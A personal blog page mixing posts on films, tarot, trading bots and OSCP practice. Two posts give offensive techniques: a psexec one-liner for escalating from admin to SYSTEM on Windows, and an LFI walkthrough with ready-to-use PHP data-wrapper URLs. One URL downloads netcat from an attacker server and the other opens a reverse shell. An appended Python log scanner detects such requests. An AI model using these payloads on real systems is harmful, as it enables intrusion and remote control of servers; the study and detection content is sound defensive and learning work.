Blog

  • Hobo With a Shotgun

    Fun, funny, and gory. Perfect camp.

    While it’s not the speech at the end of Blade Runner, Hobo With a Shotgun is one of Rutger Hauer’s most enjoyable films. Post-apocalyptic and campy, with tons of blood and guts. If you liked Machete, you’re probably going to like this one. You can watch it on Amazon Prime.

  • @TJ Null’s OSCP prep

    If you are like me, working your way through the PWK and OSCP, there are worse ways to spend your time than @TJ Null’s playlist on YouTube. Recently updated again with run-throughs by IppSec of relevant boxes. And if you haven’t yet, just get a VIP subscription to hackthebox.eu; it’s 10 Euros a month for unlimited legal online practice. It’s worth it.

  • Have you ever played around with Tarot?

    I’ve been using tarot cards for decades and it doesn’t matter whether they are digital or physical cards in your hands. The secret to getting them to work is concentration. The more you actually concentrate the contents of your mind, the more accurate the reading. Practice with these. The kind and generous maker of fourthdimension.net has put the Crowley deck online for free, and it is absolutely the best deck published so far, chock full of hidden mysteries and philosophical allegory. Avail yourself.

  • Cutting the uncuttable

    Evidently science has invented something we can’t cut right now. Can science microwave a burrito so hot even science can’t eat it?

  • Hacker vs Economy

    Not my image and no source available (probably from Reddit).
    Started programming trading bots a couple of months ago and got a second one finished. For this one I used the robin-stocks API wrapper to interface with Robinhood. The first is a crypto trading bot on the cex exchange. So far no profits, but (I think?) the idea is sound? Going to let them run and see if profits are to be had. Maybe patience will be a virtue here.

  • Tromeo and Juliet

    The best of all possible movies

  • Lest we forget

    With time running out on the extra unemployment benefits a lot of us have been receiving, let’s take a moment to remember this…

    via Forbes

  • Simple Windows Privesc Admin to System

    This will be short and sweet, and I only post it because it’s hard to find via Google but should be base knowledge for any hacker. SysInternals is your friend. If it’s on the box or you can drop it there, it gives pretty complete control at a very granular level. Even if you drop one or two of the tools rather than the whole suite, it makes privesc a breeze. For example, if you have admin and need System: psexec -i -s "cmd.exe" That is all. Pretty short and easy-to-read one-liner and a good tool for the arsenal.

  • Some thoughts on LFI

    Going over some really interesting stuff today on file includes and ran a couple of neat exploits on PHP running on a Windows 10 box. LFI/RFI is deadly. Sooo many ways to pop a shell if the URL includes ?file=

    My favorite of the day was using a PHP wrapper to pass a command to the page, which ended up letting me execute any arbitrary command on Windows. It works like this: the page allows passing of data into the file parameter. Then you pass ?file=data:text/plain,<?php echo shell_exec("Any random command and parameters") ?> to the URL and boom, command execution. You can use this to pass http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22certutil%20-urlcache%20-split%20-f%20%27http://<attack_server>/nc.exe%27%22)%20?%3E

    This places netcat on the system. Then you start a netcat listener on your attack box and visit the URL:

    http://<somedomain>/<something.php>?file=data:text/plain,%3C?php%20echo%20shell_exec(%22nc.exe%20-nv%20<Attacker IP>%20<Your listener port>%20-e%20cmd.exe%22)%20?%3E

    Boom. Interactive reverse shell as the php user from visiting 2 URLs in the browser. Easy win.

    Note: The % character escaping is needed for some browsers, but since you are quoting your command string, it may not be necessary, as the browser will handle URL encoding on its own.
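
What the two requests above look like from the defender's side: an added example (not code from the original post) that scans web access-log lines for query parameters carrying a PHP stream wrapper or embedded PHP code. It goes beyond the post's data: case to other wrapper schemes; the log lines, paths, and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream-wrapper schemes that do not belong in a file-include parameter.
WRAPPER_RE = re.compile(r"^\s*(data|php|expect|phar|zip):", re.I)
# A PHP open tag, or a call to a command-execution function, inside a value.
CODE_RE = re.compile(r"<\?|\b(shell_exec|system|passthru|exec|popen|proc_open)\s*\(", re.I)
# Request field of a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded to 3 rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_target(target):
    """Return (parameter, reason) findings for one request target."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        wrapper = WRAPPER_RE.match(value)
        if wrapper:
            findings.append((name, "wrapper:" + wrapper.group(1).lower()))
        if CODE_RE.search(value):
            findings.append((name, "php-code"))
    return findings

def scan_log(lines):
    """Return (line_number, findings) for every line with a suspicious parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        findings = inspect_target(request.group(1)) if request else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines (documentation IP range, harmless command).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2021:10:00:00 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2021:10:00:05 +0000] "GET /index.php?file=data:text/plain,%3C?php%20echo%20shell_exec(%22whoami%22)%20?%3E HTTP/1.1" 200 87',
    '192.0.2.77 - - [01/Jan/2021:10:00:09 +0000] "GET /index.php?file=DATA%3Atext/plain,%3C%3Fphp%20echo%20shell_exec(%22whoami%22)%3B%20%3F%3E&time=10:30 HTTP/1.1" 200 87',
    '192.0.2.10 - - [01/Jan/2021:10:01:00 +0000] "GET /index.php?file=contact.php&ref=data HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

PHP only honors data: in an include when allow_url_include is on (it is off by default), so confirming that setting is off is the matching server-side check.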